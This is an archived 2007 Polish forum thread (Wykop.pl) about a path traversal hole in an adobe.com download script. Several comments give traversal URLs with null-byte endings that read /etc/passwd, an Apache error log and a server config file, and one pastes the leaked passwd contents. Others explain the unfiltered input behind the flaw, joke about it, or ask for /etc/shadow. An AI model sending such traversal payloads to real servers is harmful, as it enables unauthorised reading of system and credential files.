Wykop.pl Wykop.pl
  • Główna
  • Wykopalisko133
  • Hity
  • Mikroblog
  • Zaloguj się
  • Zarejestruj się
Zaloguj się

Popularne tagi

  • #ciekawostki
  • #informacje
  • #technologia
  • #polska
  • #swiat
  • #motoryzacja
  • #podroze
  • #heheszki
  • #sport

Wykop

  • Ranking
  • Osiągnięcia
  • FAQ
  • O nas
  • Kontakt
  • Reklama
  • Regulamin
To Znalezisko jest w archiwum

46

adobe.com /etc/passwd

Wpadka Adobe.

fuutott
fuutott
z
adobe.com
dodany: 26.09.2007, 15:22:22
  • #
    technologia
  • #
    nowetechnologie
  • #
    wpadka
  • #
    adobe
  • #
    walidacja
  • 20
  • Otrzymuj powiadomienia
    o nowych komentarzach

Komentarze (20)

najlepsze

magyk
magyk
magyk
26.09.2007, 16:33:09
  • 13
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//etc/passwd%00

root:x:0:0:Super-User:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico smmsp:x:25:25:SendMail Message Submission Program:/: listen:x:37:4:Network Admin:/usr/net/nls: gdm:x:50:50:GDM Reserved UID:/: webservd:x:80:80:WebServer Reserved UID:/: nobody:x:60001:60001:NFS Anonymous Access User:/: noaccess:x:60002:60002:No Access User:/: nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/: patrol:x:9331:9331:Monitoring:/opt/patrol:/bin/ksh wwwtools:x:11274:11274:Web-Tech Admin:/home/wwwtools:/bin/csh wwwlogs:x:11275:11275:Log Admin:/home/wwwlogs:/usr/lib/rsh wwwdocs:x:60005:60030:Content:/home/wwwdocs:/usr/lib/rsh httpd:x:60004:60004:Apache:/home/httpd:/usr/lib/rsh svctag:x:60006:12::/tmp:/bin/pfsh

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//var/log/apache/errors.base%00

Subroutine AUTOLOAD redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 84. Subroutine isaFilehandle redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 106. Subroutine isaFilename redefined at /usr/local/lib/perl5/siteperl/5.8.8/sun4-solaris/Compress/Zlib.pm line 115. Subroutine
  • 2
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

k.....u
k.....u
konto usunięte 26.09.2007, 19:19:34
  • 4
Lepsza taka jak żadna ;) I nikt nie posądzi o jakąś autoreklamę ;)
weszlem
weszlem
26.09.2007, 17:00:15
  • 3
Chyba nie o taką kopię chodziło ;)
wtk_
wtk_
wtk_
26.09.2007, 16:00:05
  • 3
o kurde :)) dużo daje czy nie - taki błąd w skrypcie w koncernie rangi Adobe? :D głowy się posypią... kompromitacja :]
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

fuutott
fuutott
Autor
26.09.2007, 15:23:13
  • 3
Z ciekawszych znalezisk:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//var/log/apache/errors.base%00

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../..//usr/local/apache/conf/store.adobe.com.conf%00

http://reddit.com/info/2tpxi/comments
  • 1
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

maver
maver
26.09.2007, 22:48:26
  • 2
O kurczę, toć to błąd, który popełnia człowiek UCZĄCY się dopiero PHP/Perla/jakiegokolwiek innego języka programowania. Kogo Adobe zatrudnia na stanowiska swoich webmasterów? Z chęcią zgłoszę się na rozmowę kwalifikacyjną na miejsce tego delikwenta ;).

Dla tych, którzy nie wiedzą do końca o co chodzi: Programista po pierwsze nie odfiltrował zawartości zmiennych pochodzących z adresu strony, po drugie wypisywał zawartość pliku wskazanego przez tą zmienną bezpośrednio do użytkownika, co jest chyba najgorszym błędem
za017
za017
26.09.2007, 21:15:18
  • 2
To może ma ktoś plik /etc/shadow - byłby bardziej przydatny (na pewno bardziej niż /etc/passwd)
  • 2
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

za017
za017
27.09.2007, 04:23:40
  • 1
kris2: to jasne, że nie ma uprawnień, inaczej po co by używać /etc/shadow ? Można by po staremu przechowywać hasła w /etc/passwd : tylko sobie żartowałem ;)
kris2
kris2
kris2
26.09.2007, 21:19:25
  • 1
podejrzewam że server www nie mial uprawnieni dostepu do /etc/shadow
koniczynek
koniczynek
26.09.2007, 15:59:01
  • 2
Wpadka jest, ale czy ktokolwiek z tutaj zgromadzony wie, że znajomość passwd daje bardzo mało?
  • 5
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

fuutott
fuutott
Autor
26.09.2007, 16:04:00
  • 21
When you get the passwd you can get some other files too. When you get other files, the important files, you get the money. Then when you get the money, you get the power. Then when you get the power, then you get the women.

Say hello to my little friend.
koniczynek
koniczynek
27.09.2007, 08:45:26
  • 2
Opis zaiście powala, "jak zdobędziesz coś, to zdobędziesz coś więcej, jak zdobędziesz coś więcej, to będziesz mógł zdobyć jeszcze więcej, ....". Tak na prawdę, to passwd jest dostępne do odczytu dla każdego nie bez powodu.
dzejms
dzejms
27.09.2007, 10:24:25
  • 1
Nice one brother!
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

mentis
mentis
27.09.2007, 08:42:56
  • 0
W dzisiejszych czasach admini są tak leniwi, że nawet sandboxa nie robią dla tępych webmasterów.
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

wh1t3en
wh1t3en
26.09.2007, 16:28:50
  • -1
Już nie działa, ktoś mógłby dać kopie :)
  • 1
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

L.....x
L.....x
konto usunięte 26.09.2007, 16:34:33
  • 0
właśnie, ma ktoś kopie lub skan?
janek_
janek_
26.09.2007, 15:31:14
  • -9
nieźle
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

Hity

tygodnia

Kobiety na LinkedIn masowo wyśmiewają popularny post o dyskryminacji mężczyzn
Kobiety na LinkedIn masowo wyśmiewają popularny post o dyskryminacji mężczyzn
3246
32-latek umiera z przyczyn naturalnych w gdańskim areszcie.
32-latek umiera z przyczyn naturalnych w gdańskim areszcie.
2426
Nie ma fajnej rozowej, jest chłop, ktory nie ma lekko z chorym dzieckiem.
Nie ma fajnej rozowej, jest chłop, ktory nie ma lekko z chorym dzieckiem.
2054
iRobot - producent robotów sprzątających właśnie zbankrutował
iRobot - producent robotów sprzątających właśnie zbankrutował
1899
Morele i gwarancja RAM
Morele i gwarancja RAM
1940
Pokaż więcej

Powiązane tagi

  • #ciekawostki
  • #nauka
  • #komputery
  • #zainteresowania
  • #stacjakosmiczna
  • #wydarzenia
  • #polska
  • #informatyka
  • #internet
  • #swiat
  • #sztucznainteligencja
  • #rozrywka
  • #ai
  • #motoryzacja
  • #telefony

Wykop © 2005-2025

  • O nas
  • Reklama
  • FAQ
  • Kontakt
  • Regulamin
  • Polityka prywatności i cookies
  • Hity
  • Ranking
  • Osiągnięcia
  • Changelog
  • więcej

RSS

  • Wykopane
  • Wykopalisko
  • Komentowane
  • Ustawienia prywatności

Regulamin

Reklama

Kontakt

O nas

FAQ

Osiągnięcia

Ranking